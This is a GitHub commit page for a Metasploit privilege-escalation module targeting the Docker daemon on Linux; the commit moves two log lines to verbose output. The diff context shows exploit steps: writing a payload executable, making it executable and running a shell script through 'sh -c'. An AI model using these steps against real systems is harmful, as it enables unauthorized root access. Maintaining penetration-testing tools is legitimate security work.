Skip to content

Commit 0635fee

Browse files
author
forzoni
committed
Move some log lines to vprint_status.
1 parent 6c11692 commit 0635fee

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/linux/local/docker_daemon_privilege_escalation.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -49,8 +49,8 @@ def exploit
4949
print_status("Writing payload executable to '#{exe_file}'")
5050
write_file(exe_file, pl)
5151
cmd_exec("chmod +x #{exe_file}")
52-
print_status shell_script(exe_file)
53-
print_status cmd_exec("sh -c '#{shell_script(exe_file)}'")
52+
vprint_status shell_script(exe_file)
53+
vprint_status cmd_exec("sh -c '#{shell_script(exe_file)}'")
5454

5555
stime = Time.now.to_f
5656
print_status "Starting the payload handler..."

0 commit comments

Comments
 (0)